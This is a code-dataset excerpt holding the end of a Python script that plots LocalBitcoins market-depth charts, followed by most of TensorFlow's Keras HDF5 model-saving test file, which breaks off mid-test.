selection = ['UK','USA','SPAIN','FRANCE','GERMANY','BRAZIL']
else:
selection = args[0].countries
fig = plt.figure()
dim = math.ceil(len(selection)**0.5)
for x, s in enumerate(selection):
market = markets[s]
# method = methods['NATIONAL_BANK_TRANSFER']
ax = fig.add_subplot(dim, dim, x+1)
ax.set_xlabel(market['curr'])
ax.set_ylabel('BTC')
ax.set_title('Local Bitcoins online: %s' % s)
buy_curve = get_buy_curve(market)
sell_curve = get_sell_curve(market)
plot_chart(ax, buy_curve, sell_curve)
plt.tight_layout()
plt.show()
def main():
parser = argparse.ArgumentParser(description='Display charts of the Local Bitcoin market depth.')
parser.add_argument('countries', type=str, nargs='*',
help='optionally specify any number of country names')
args = parser.parse_args()
make_charts(args)
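# --- Illustrative sketch, not part of the original script ---
# Fetches the current best buy/sell prices for one market; this performs live
# HTTP requests against localbitcoins.com, so it is only a usage illustration.
def _demo_spread(country='UK'):
    bid = get_bid(country)
    ask = get_ask(country)
    print 'Best %s bid: %.2f, best ask: %.2f' % (country, bid, ask)
    return bid - ask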
if __name__ == '__main__':
main()
|
mit
| -5,073,392,285,492,566,000 | 34.731429 | 107 | 0.592196 | false |
jhseu/tensorflow
|
tensorflow/python/keras/saving/hdf5_format_test.py
|
1
|
46964
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Tests for model saving in the HDF5 format."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import shutil
import tempfile
from absl.testing import parameterized
import numpy as np
from tensorflow.python import keras
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import optimizers
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.engine import training
from tensorflow.python.keras.saving import hdf5_format
from tensorflow.python.lib.io import file_io
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import checkpoint_management
from tensorflow.python.training import training as training_module
from tensorflow.python.training.tracking import util as trackable
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
class TestWeightSavingAndLoading(test.TestCase, parameterized.TestCase):
@keras_parameterized.run_with_all_saved_model_formats
@test_util.run_in_graph_and_eager_modes
def test_weight_loading(self):
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir)
saved_model_dir = os.path.join(temp_dir, 'saved_model')
save_format = testing_utils.get_save_format()
with self.cached_session():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3)(a)
b = keras.layers.Dense(1)(x)
model = keras.models.Model(a, b)
x = np.random.random((3, 2))
ref_y = model.predict(x)
weights = model.get_weights()
model.set_weights(weights)
y = model.predict(x)
self.assertAllClose(ref_y, y)
with self.assertRaises(ValueError):
model.set_weights(weights[1:])
with self.assertRaises(ValueError):
model.set_weights(weights[::-1])
model.save_weights(saved_model_dir, save_format=save_format)
model.load_weights(saved_model_dir)
y = model.predict(x)
self.assertAllClose(ref_y, y)
@test_util.run_in_graph_and_eager_modes
def test_weight_preprocessing(self):
input_dim = 3
output_dim = 3
size = 2
cases = [
[
(keras.layers.Bidirectional(keras.layers.SimpleRNN(2))),
[np.random.random((2, 1)), np.random.random((2, 1))],
(None, 3, 2),
],
[
(keras.layers.TimeDistributed(keras.layers.Dense(1))),
[np.random.random((2, 1)), np.random.random((1,))],
(None, 3, 2),
],
[
(keras.layers.Conv1D(output_dim, size, use_bias=False)),
[np.random.random((output_dim, input_dim, size, 1))],
(None, 4, input_dim),
],
[
(keras.layers.Conv2D(output_dim, size,
use_bias=False, data_format='channels_first')),
[np.random.random((output_dim, input_dim, size, size))],
(None, input_dim, 4, 4),
],
[
(keras.layers.Conv2DTranspose(output_dim, size,
use_bias=False,
data_format='channels_first')),
[np.random.random((output_dim, input_dim, size, size))],
(None, input_dim, 4, 4),
],
[
(keras.layers.Conv2DTranspose(output_dim, size,
use_bias=False,
data_format='channels_last')),
[np.random.random((size, size, input_dim, output_dim))],
(None, 4, 4, input_dim),
],
[
(keras.layers.Conv3D(output_dim, size,
use_bias=False, data_format='channels_first')),
[np.random.random((output_dim, input_dim, size, size, size))],
(None, input_dim, 4, 4, 4),
],
[
(keras.layers.GRUV1(output_dim)),
[np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,))],
(None, 4, input_dim),
],
[
(keras.layers.LSTMV1(output_dim)),
[np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,))],
(None, 4, input_dim),
],
]
for layer, weights, input_shape in cases:
layer.build(input_shape)
_ = hdf5_format.preprocess_weights_for_loading(
layer, weights, original_keras_version='1')
model = keras.models.Sequential([keras.layers.Dense(2, input_dim=2)])
_ = hdf5_format.preprocess_weights_for_loading(
model, model.weights, original_keras_version='1')
x = keras.Input((2,))
y = keras.layers.Dense(2)(x)
model = keras.models.Model(x, y)
_ = hdf5_format.preprocess_weights_for_loading(
model, model.weights, original_keras_version='1')
@parameterized.named_parameters(
('gru', keras.layers.GRU, {
'units': 2,
'input_shape': (3, 5)
}),
('gru_with_reset_after', keras.layers.GRU, {
'units': 2,
'input_shape': (3, 5),
'reset_after': True
}),
('lstm', keras.layers.LSTM, {
'units': 2,
'input_shape': (3, 5)
}),
('cudnngru', keras.layers.CuDNNGRU, {
'units': 2,
'input_shape': (3, 5)
}),
('cudnnlstm', keras.layers.CuDNNLSTM, {
'units': 2,
'input_shape': (3, 5)
}))
def test_preprocess_weights_for_loading_rnn_should_be_idempotent(
self, layer_class, layer_args):
with self.cached_session():
layer = layer_class(**layer_args)
layer.build(input_shape=layer_args.get('input_shape'))
weights1 = layer.get_weights()
weights2 = hdf5_format.preprocess_weights_for_loading(
layer, weights1)
_ = [
self.assertAllClose(x, y, rtol=1e-05)
for (x, y) in zip(weights1, weights2)
]
@test_util.run_in_graph_and_eager_modes
def test_sequential_weight_loading(self):
if h5py is None:
return
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir)
h5_path = os.path.join(temp_dir, 'test.h5')
num_hidden = 5
input_dim = 3
batch_size = 5
num_classes = 2
with self.cached_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(num_hidden, input_dim=input_dim))
model.add(keras.layers.Dense(num_classes))
x = np.random.random((batch_size, input_dim))
ref_y = model.predict(x)
model.save_weights(h5_path)
model = keras.models.Sequential()
model.add(keras.layers.Dense(num_hidden, input_dim=input_dim))
model.add(keras.layers.Dense(num_classes))
model.load_weights(h5_path)
y = model.predict(x)
self.assertAllClose(y, ref_y)
@keras_parameterized.run_with_all_saved_model_formats
@test_util.run_in_graph_and_eager_modes
def test_nested_model_weight_loading(self):
save_format = testing_utils.get_save_format()
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir)
saved_model_dir = os.path.join(temp_dir, 'saved_model')
batch_size = 5
shape = (None, None, 3)
with self.cached_session():
def gen_model():
def seq_model():
model = keras.models.Sequential([
keras.layers.Conv2D(3, 1, input_shape=shape),
keras.layers.BatchNormalization()])
return model
x = inner_inputs = keras.layers.Input((None, None, 3))
x = seq_model()(x)
x = seq_model()(x)
inner_model = keras.models.Model(inner_inputs, x)
inputs = keras.layers.Input(shape)
return keras.models.Model(inputs, inner_model(inputs))
model = gen_model()
x = np.random.random((batch_size, 1, 1, 3))
ref_y = model.predict(x)
model.save_weights(saved_model_dir, save_format=save_format)
model = gen_model()
model.load_weights(saved_model_dir)
y = model.predict(x)
self.assertAllClose(y, ref_y)
@test_util.run_in_graph_and_eager_modes
def test_sequential_weight_loading_group_name_with_incorrect_length(self):
if h5py is None:
return
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir)
h5_path = os.path.join(temp_dir, 'test.h5')
num_hidden = 5
input_dim = 3
num_classes = 2
with self.cached_session():
ref_model = keras.models.Sequential()
ref_model.add(keras.layers.Dense(num_hidden, input_dim=input_dim,
name='d1'))
ref_model.add(keras.layers.Dense(num_classes, name='d2'))
ref_model.compile(loss=keras.losses.MSE,
optimizer='rmsprop',
metrics=[keras.metrics.categorical_accuracy])
f_ref_model = h5py.File(h5_path, 'w')
hdf5_format.save_weights_to_hdf5_group(f_ref_model, ref_model.layers)
f_model = h5py.File(h5_path, 'r')
model = keras.models.Sequential()
model.add(keras.layers.Dense(num_hidden, use_bias=False,
input_dim=input_dim, name='d1'))
model.add(keras.layers.Dense(num_classes, name='d2'))
model.compile(loss=keras.losses.MSE,
optimizer='rmsprop',
metrics=[keras.metrics.categorical_accuracy])
with self.assertRaisesRegexp(ValueError,
r'Layer #0 \(named \"d1\"\) expects 1 '
r'weight\(s\), but the saved weights have 2 '
r'element\(s\)\.'):
hdf5_format.load_weights_from_hdf5_group_by_name(f_model, model.layers)
hdf5_format.load_weights_from_hdf5_group_by_name(
f_model, model.layers, skip_mismatch=True)
self.assertAllClose(keras.backend.get_value(ref_model.layers[1].kernel),
keras.backend.get_value(model.layers[1].kernel))
@test_util.run_deprecated_v1
def test_sequential_weight_loading_group_name_with_incorrect_shape(self):
if h5py is None:
return
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir)
h5_path = os.path.join(temp_dir, 'test.h5')
num_hidden = 5
input_dim = 3
num_classes = 2
with self.cached_session():
ref_model = keras.models.Sequential()
ref_model.add(keras.layers.Dense(num_hidden, input_dim=input_dim,
name='d1'))
ref_model.add(keras.layers.Dense(num_classes, name='d2'))
ref_model.compile(loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(lr=0.0001),
metrics=[keras.metrics.categorical_accuracy])
f_ref_model = h5py.File(h5_path, 'w')
keras.backend.set_value(ref_model.layers[1].bias, [3.5] * num_classes)
hdf5_format.save_weights_to_hdf5_group(f_ref_model, ref_model.layers)
f_model = h5py.File(h5_path, 'r')
model = keras.models.Sequential()
model.add(keras.layers.Dense(num_hidden + 5, input_dim=input_dim,
name='d1'))
model.add(keras.layers.Dense(num_classes, name='d2'))
model.compile(loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(lr=0.0001),
metrics=[keras.metrics.categorical_accuracy])
with self.assertRaisesRegexp(ValueError,
r'Layer #0 \(named "d1"\), weight '
r'<tf\.Variable \'d1_1\/kernel:0\' '
r'shape=\(3, 10\) dtype=float32> has '
r'shape \(3, 10\), but the saved weight has '
r'shape \(3, 5\)\.'):
hdf5_format.load_weights_from_hdf5_group_by_name(f_model, model.layers)
hdf5_format.load_weights_from_hdf5_group_by_name(
f_model, model.layers, skip_mismatch=True)
self.assertAllClose([3.5] * num_classes,
keras.backend.get_value(model.layers[1].bias))
@keras_parameterized.run_with_all_saved_model_formats
class TestWholeModelSaving(test.TestCase, parameterized.TestCase):
def _save_model_dir(self, dirname='saved_model'):
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
return os.path.join(temp_dir, dirname)
def test_sequential_model_saving(self):
saved_model_dir = self._save_model_dir()
save_format = testing_utils.get_save_format()
with self.cached_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.RepeatVector(3))
model.add(keras.layers.TimeDistributed(keras.layers.Dense(3)))
model.compile(
loss=keras.losses.MSE,
optimizer=keras.optimizer_v2.rmsprop.RMSprop(lr=0.0001),
metrics=[
keras.metrics.categorical_accuracy,
keras.metrics.CategoricalCrossentropy(
name='cce', label_smoothing=constant_op.constant(0.2)),
],
weighted_metrics=[
keras.metrics.categorical_crossentropy,
keras.metrics.CategoricalCrossentropy(
name='cce', label_smoothing=constant_op.constant(0.2)),
],
sample_weight_mode='temporal')
x = np.random.random((1, 3))
y = np.random.random((1, 3, 3))
model.train_on_batch(x, y)
out = model.predict(x)
keras.models.save_model(model, saved_model_dir, save_format=save_format)
new_model = keras.models.load_model(saved_model_dir)
out2 = new_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
# Test that new training updates produce the same results for both models.
model.train_on_batch(x, y)
new_model.train_on_batch(x, y)
eval_out = model.evaluate(x, y)
eval_out2 = new_model.evaluate(x, y)
self.assertArrayNear(eval_out, eval_out2, 0.001)
out = model.predict(x)
out2 = new_model.predict(x)
# The model has been trained on two batches. So the tolerance is larger.
self.assertAllClose(out, out2, atol=0.01)
@test_util.run_deprecated_v1
def test_sequential_model_saving_without_input_shape(self):
saved_model_dir = self._save_model_dir()
save_format = testing_utils.get_save_format()
with self.cached_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2))
model.add(keras.layers.RepeatVector(3))
model.add(keras.layers.TimeDistributed(keras.layers.Dense(3)))
model.compile(
loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(lr=0.0001),
metrics=[
keras.metrics.categorical_accuracy,
keras.metrics.CategoricalAccuracy()
],
weighted_metrics=[
keras.metrics.categorical_accuracy,
keras.metrics.CategoricalAccuracy()
],
sample_weight_mode='temporal')
x = np.random.random((1, 3))
y = np.random.random((1, 3, 3))
model.train_on_batch(x, y)
out = model.predict(x)
model.save(saved_model_dir, save_format=save_format)
new_model = keras.models.load_model(saved_model_dir)
out2 = new_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
def test_sequential_model_saving_without_compile(self):
saved_model_dir = self._save_model_dir()
save_format = testing_utils.get_save_format()
with self.cached_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.RepeatVector(3))
model.add(keras.layers.TimeDistributed(keras.layers.Dense(3)))
x = np.random.random((1, 3))
out = model.predict(x)
# Save the model without any compilation or training.
keras.models.save_model(model, saved_model_dir, save_format=save_format)
new_model = keras.models.load_model(saved_model_dir)
out2 = new_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
@test_util.run_deprecated_v1
def test_sequential_model_saving_2(self):
saved_model_dir = self._save_model_dir()
save_format = testing_utils.get_save_format()
with self.cached_session():
# test with custom optimizer, loss
class CustomOp(keras.optimizers.RMSprop):
pass
def custom_loss(y_true, y_pred):
return keras.losses.mse(y_true, y_pred)
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss=custom_loss, optimizer=CustomOp(), metrics=['acc'])
x = np.random.random((1, 3))
y = np.random.random((1, 3))
model.train_on_batch(x, y)
out = model.predict(x)
keras.models.save_model(model, saved_model_dir, save_format=save_format)
model = keras.models.load_model(
saved_model_dir,
custom_objects={'CustomOp': CustomOp,
'custom_loss': custom_loss})
out2 = model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
@test_util.run_deprecated_v1
def test_functional_model_saving(self):
saved_model_dir = self._save_model_dir()
save_format = testing_utils.get_save_format()
with self.cached_session():
inputs = keras.layers.Input(shape=(3,))
x = keras.layers.Dense(2)(inputs)
output = keras.layers.Dense(3)(x)
model = keras.models.Model(inputs, output)
model.compile(
loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(lr=0.0001),
metrics=[
keras.metrics.categorical_accuracy,
keras.metrics.CategoricalAccuracy()
],
weighted_metrics=[
keras.metrics.categorical_accuracy,
keras.metrics.CategoricalAccuracy()
])
x = np.random.random((1, 3))
y = np.random.random((1, 3))
model.train_on_batch(x, y)
out = model.predict(x)
keras.models.save_model(model, saved_model_dir, save_format=save_format)
model = keras.models.load_model(saved_model_dir)
out2 = model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
def test_saving_without_compilation(self):
saved_model_dir = self._save_model_dir()
save_format = testing_utils.get_save_format()
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss='mse', optimizer='sgd', metrics=['acc'])
keras.models.save_model(model, saved_model_dir, save_format=save_format)
model = keras.models.load_model(saved_model_dir)
def test_saving_with_tf_optimizer(self):
saved_model_dir = self._save_model_dir()
save_format = testing_utils.get_save_format()
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss='mse',
optimizer=training_module.AdadeltaOptimizer(0.1),
metrics=['acc'])
keras.models.save_model(model, saved_model_dir, save_format=save_format)
model = keras.models.load_model(saved_model_dir)
def test_saving_right_after_compilation(self):
saved_model_dir = self._save_model_dir()
save_format = testing_utils.get_save_format()
with self.cached_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss='mse', optimizer='sgd', metrics=['acc'])
model._make_train_function()
keras.models.save_model(model, saved_model_dir, save_format=save_format)
model = keras.models.load_model(saved_model_dir)
def test_saving_lambda_numpy_array_arguments(self):
saved_model_dir = self._save_model_dir()
save_format = testing_utils.get_save_format()
if h5py is None:
self.skipTest('h5py required to run this test')
mean = np.random.random((4, 2, 3))
std = np.abs(np.random.random((4, 2, 3))) + 1e-5
inputs = keras.layers.Input(shape=(4, 2, 3))
output = keras.layers.Lambda(lambda image, mu, std: (image - mu) / std,
arguments={'mu': mean, 'std': std})(inputs)
model = keras.models.Model(inputs, output)
model.compile(loss='mse', optimizer='sgd', metrics=['acc'])
keras.models.save_model(model, saved_model_dir, save_format=save_format)
model = keras.models.load_model(saved_model_dir)
self.assertAllClose(mean, model.layers[1].arguments['mu'])
self.assertAllClose(std, model.layers[1].arguments['std'])
def test_saving_model_with_long_layer_names(self):
saved_model_dir = self._save_model_dir()
save_format = testing_utils.get_save_format()
with self.cached_session():
# This layer name will make the `layer_names` HDF5 attribute blow
# out of proportion. Note that it fits into the internal HDF5
# attribute memory limit on its own, but because h5py converts
# the list of layer names into a numpy array, which uses the same
# amount of memory for every item, it increases the memory
# requirements substantially.
x = keras.Input(shape=(2,), name='input_' + ('x' * (2**15)))
f = x
for i in range(4):
f = keras.layers.Dense(2, name='dense_%d' % (i,))(f)
model = keras.Model(inputs=[x], outputs=[f])
model.compile(
'adam', loss=keras.losses.MeanSquaredError(), metrics=['acc'])
x = np.random.random((1, 2))
y = np.random.random((1, 2))
model.train_on_batch(x, y)
out = model.predict(x)
keras.models.save_model(model, saved_model_dir, save_format=save_format)
model = keras.models.load_model(saved_model_dir)
if save_format in ['tf', 'tensorflow']:
return
# Check that the HDF5 file contains a chunked array
# of layer names.
with h5py.File(saved_model_dir, 'r') as h5file:
num_names_arrays = len([attr for attr in h5file['model_weights'].attrs
if attr.startswith('layer_names')])
# The chunking of layer names array should have happened.
self.assertGreater(num_names_arrays, 0)
out2 = model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
def test_saving_model_with_long_weights_names(self):
saved_model_dir = self._save_model_dir()
save_format = testing_utils.get_save_format()
with self.cached_session():
x = keras.Input(shape=(2,), name='nested_model_input')
f = x
for i in range(4):
f = keras.layers.Dense(2, name='nested_model_dense_%d' % (i,))(f)
# This layer name will make the `weight_names`
# HDF5 attribute blow out of proportion.
f = keras.layers.Dense(2, name='nested_model_output' + ('x' * (2**14)))(f)
nested_model = keras.Model(inputs=[x], outputs=[f], name='nested_model')
x = keras.Input(shape=(2,), name='outer_model_input')
f = nested_model(x)
f = keras.layers.Dense(2, name='outer_model_output')(f)
model = keras.Model(inputs=[x], outputs=[f])
model.compile(loss='mse', optimizer='adam', metrics=['acc'])
x = np.random.random((1, 2))
y = np.random.random((1, 2))
model.train_on_batch(x, y)
out = model.predict(x)
keras.models.save_model(model, saved_model_dir, save_format=save_format)
model = keras.models.load_model(saved_model_dir)
if save_format in ['h5', 'hdf5', 'keras']:
# Check that the HDF5 file contains a chunked array
# of weight names.
with h5py.File(saved_model_dir, 'r') as h5file:
num_weight_arrays = len(
[attr for attr in h5file['model_weights']['nested_model'].attrs
if attr.startswith('weight_names')])
# The chunking of the weight names array should have happened.
self.assertGreater(num_weight_arrays, 0)
out2 = model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
@test_util.run_deprecated_v1
def test_model_saving_to_pre_created_h5py_file(self):
saved_model_dir = self._save_model_dir()
save_format = testing_utils.get_save_format()
with self.cached_session():
inputs = keras.Input(shape=(3,))
x = keras.layers.Dense(2)(inputs)
outputs = keras.layers.Dense(3)(x)
model = keras.Model(inputs, outputs)
model.compile(
loss=keras.losses.MSE,
optimizer=keras.optimizers.Adam(),
metrics=[
keras.metrics.categorical_accuracy,
keras.metrics.CategoricalAccuracy()
])
x = np.random.random((1, 3))
y = np.random.random((1, 3))
model.train_on_batch(x, y)
out = model.predict(x)
keras.models.save_model(model, saved_model_dir, save_format=save_format)
loaded_model = keras.models.load_model(saved_model_dir)
out1 = loaded_model.predict(x)
self.assertAllClose(out, out1, atol=1e-05)
if save_format in ['tf', 'tensorflow']:
return
# Test h5 format specifically
fd, fname = tempfile.mkstemp('.h5')
with h5py.File(fname, mode='r+') as h5file:
keras.models.save_model(model, h5file)
loaded_model = keras.models.load_model(h5file)
out2 = loaded_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
# Test non-default options in h5
with h5py.File('_', driver='core',
backing_store=False) as h5file:
keras.models.save_model(model, h5file)
loaded_model = keras.models.load_model(h5file)
out2 = loaded_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
# Cleanup
os.close(fd)
os.remove(fname)
def test_saving_constant_initializer_with_numpy(self):
saved_model_dir = self._save_model_dir()
save_format = testing_utils.get_save_format()
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
2,
input_shape=(3,),
kernel_initializer=keras.initializers.Constant(np.ones((3, 2)))))
model.add(keras.layers.Dense(3))
model.compile(loss='mse', optimizer='sgd', metrics=['acc'])
keras.models.save_model(model, saved_model_dir, save_format=save_format)
model = keras.models.load_model(saved_model_dir)
def test_saving_group_naming_h5py(self):
# Test saving a model with a layer whose name is a prefix of a previous
# layer's name.
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir)
h5_path = os.path.join(temp_dir, 'test.h5')
input_layer = keras.layers.Input((None, None, 3), name='test_input')
x = keras.layers.Conv2D(1, 1, name='conv1/conv')(input_layer)
x = keras.layers.Activation('relu', name='conv1')(x)
model = keras.models.Model(inputs=input_layer, outputs=x)
model.save_weights(h5_path)
model.load_weights(h5_path)
def test_primitive_attrs_contain_no_extraneous_strings(self):
if h5py is None:
self.skipTest('h5py required to run this test')
saved_model_dir = self._save_model_dir()
save_format = testing_utils.get_save_format()
model = keras.models.Sequential()
model.add(keras.layers.Dense(1, input_shape=[2]))
model.save(saved_model_dir, save_format=save_format)
if save_format in ['tf', 'tensorflow']:
return
h5file = h5py.File(saved_model_dir, 'r')
self.assertRegexpMatches(
h5file.attrs['keras_version'], r'^[\d]+\.[\d]+\.[\S]+$')
@test_util.run_in_graph_and_eager_modes
def test_functional_model_with_custom_loss_and_metric(self):
def _make_model():
inputs = keras.Input(shape=(4,))
x = keras.layers.Dense(8, activation='relu')(inputs)
outputs = keras.layers.Dense(3, activation='softmax')(x)
model = keras.Model(inputs=inputs, outputs=outputs)
custom_loss = keras.layers.Lambda(lambda x: keras.backend.sum(x * x))(x)
model.add_loss(custom_loss)
model.add_metric(custom_loss, aggregation='mean', name='custom_loss')
return model
saved_model_dir = self._save_model_dir()
save_format = testing_utils.get_save_format()
model = _make_model()
model.compile(
loss=keras.losses.SparseCategoricalCrossentropy(),
optimizer=optimizers.gradient_descent_v2.SGD(),
metrics=[keras.metrics.SparseCategoricalCrossentropy()])
x = np.random.normal(size=(32, 4))
y = np.random.randint(0, 3, size=32)
model.train_on_batch(x, y)
evaluation_results = model.evaluate(x, y)
# Save and reload model.
model.save(saved_model_dir, save_format=save_format)
del model # Prevent misuse.
loaded_model = keras.models.load_model(saved_model_dir)
loaded_model_eval_results = loaded_model.evaluate(x, y)
# Assert all evaluation results are the same.
self.assertAllClose(evaluation_results, loaded_model_eval_results, 1e-9)
# Check correctness of the loss calculation.
self.assertAllGreater(evaluation_results, 0.)
evaluation_results = dict(
zip(loaded_model.metrics_names, evaluation_results))
self.assertNear(
evaluation_results['sparse_categorical_crossentropy'] +
evaluation_results['custom_loss'], evaluation_results['loss'], 1e-6)
def test_save_uncompiled_model_with_optimizer(self):
saved_model_dir = self._save_model_dir()
save_format = testing_utils.get_save_format()
model = keras.models.Sequential([keras.layers.Dense(1, input_shape=(3,))])
# Set the model's optimizer but don't compile. This can happen if the model
# is trained with a custom training loop.
model.optimizer = keras.optimizer_v2.rmsprop.RMSprop(lr=0.0001)
model.save(saved_model_dir, save_format=save_format)
if save_format in ['tf', 'tensorflow']:
loaded = keras.models.load_model(saved_model_dir)
self.assertIsInstance(loaded.optimizer,
keras.optimizer_v2.optimizer_v2.OptimizerV2)
# Factory functions to create models that will be serialized inside a Network.
def _make_graph_network(input_size, output_size):
inputs = keras.Input(input_size)
x = keras.layers.Dense(8, activation='relu')(inputs)
y = keras.layers.Dense(output_size)(x)
return keras.Model(inputs=inputs, outputs=y)
def _make_sequential(input_size, output_size):
del input_size
return keras.Sequential([
keras.layers.Dense(8, activation='relu'),
keras.layers.Dense(output_size),
])
def _make_sequential_built(input_size, output_size):
model = _make_sequential(input_size, output_size)
model.build((None, input_size))
return model
def _make_sequential_graph_network(input_size, output_size):
return keras.Sequential([
keras.layers.InputLayer(input_size),
keras.layers.Dense(8, activation='relu'),
keras.layers.Dense(output_size),
])
def _make_sequential_input_shape(input_size, output_size):
return keras.Sequential([
keras.layers.Dense(8, activation='relu', input_shape=(input_size,)),
keras.layers.Dense(output_size),
])
class _make_subclassed(keras.Model): # pylint: disable=invalid-name
def __init__(self, input_size, output_size):
super(_make_subclassed, self).__init__()
self._config = {'input_size': input_size, 'output_size': output_size}
self._hidden_layer = keras.layers.Dense(8, activation='relu', name='hidden')
self._logits_layer = keras.layers.Dense(output_size, name='logits')
def call(self, inputs):
x = self._hidden_layer(inputs)
return self._logits_layer(x)
def get_config(self):
return self._config
@classmethod
def from_config(cls, config):
return cls(**config)
class _make_subclassed_built(_make_subclassed): # pylint: disable=invalid-name
def __init__(self, input_size, output_size):
super(_make_subclassed_built, self).__init__(input_size, output_size)
self.build((None, input_size))
class TestWholeModelSavingWithNesting(test.TestCase, parameterized.TestCase):
"""Tests saving a whole model that contains other models."""
@parameterized.named_parameters([
('graph_network', _make_graph_network),
('sequential', _make_sequential),
('sequential_built', _make_sequential_built),
('sequential_graph_network', _make_sequential_graph_network),
('sequential_input_shape', _make_sequential_input_shape),
('subclassed', _make_subclassed),
('subclassed_built', _make_subclassed_built),
])
@test_util.run_in_graph_and_eager_modes
def test_functional(self, model_fn):
"""Tests serializing a model that uses a nested model to share weights."""
if h5py is None:
self.skipTest('h5py required to run this test')
def _make_model():
inputs = (keras.Input(shape=(4,), name='examples'),
keras.Input(shape=(4,), name='neighbors'))
base_model = model_fn(inputs[0].shape.as_list()[-1], 2)
outputs = keras.layers.add([base_model(inputs[0]), base_model(inputs[1])])
return keras.Model(inputs=inputs, outputs=outputs)
x = (np.random.normal(size=(16, 4)).astype(np.float32),
np.random.normal(size=(16, 4)).astype(np.float32))
model = _make_model()
predictions = model(x)
# Save and reload.
model_path = os.path.join(self.get_temp_dir(), 'model.h5')
model.save(model_path)
del model
loaded_model = keras.models.load_model(
model_path,
custom_objects={
'_make_subclassed': _make_subclassed,
'_make_subclassed_built': _make_subclassed_built,
},
compile=False)
self.assertAllClose(loaded_model(x), predictions, 1e-9)
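# Minimal subclassed model (two Dense layers) shared by the TF-format
# weight saving and loading tests below.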
class SubclassedModel(training.Model):
def __init__(self):
super(SubclassedModel, self).__init__()
self.x_layer = keras.layers.Dense(3)
self.b_layer = keras.layers.Dense(1)
def call(self, a):
return self.b_layer(self.x_layer(a))
class TestWeightSavingAndLoadingTFFormat(test.TestCase):
def test_keras_optimizer_warning(self):
graph = ops.Graph()
with graph.as_default(), self.session(graph):
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss='mse', optimizer=optimizers.Adam(), metrics=['acc'])
model._make_train_function()
temp_dir = self.get_temp_dir()
prefix = os.path.join(temp_dir, 'ckpt')
with test.mock.patch.object(logging, 'warning') as mock_log:
model.save_weights(prefix)
self.assertRegexpMatches(
str(mock_log.call_args),
'Keras optimizer')
@test_util.run_in_graph_and_eager_modes
def test_tensorflow_format_overwrite(self):
with self.cached_session() as session:
model = SubclassedModel()
temp_dir = self.get_temp_dir()
prefix = os.path.join(temp_dir, 'ckpt')
x = constant_op.constant(np.random.random((3, 2)), dtype=dtypes.float32)
executing_eagerly = context.executing_eagerly()
model(x) # pylint: disable=not-callable
if not executing_eagerly:
session.run([v.initializer for v in model.variables])
model.save_weights(prefix, save_format='tensorflow')
model.save_weights(prefix, save_format='tensorflow', overwrite=True)
with self.assertRaises(EOFError):
# Indirectly tests that the user is prompted
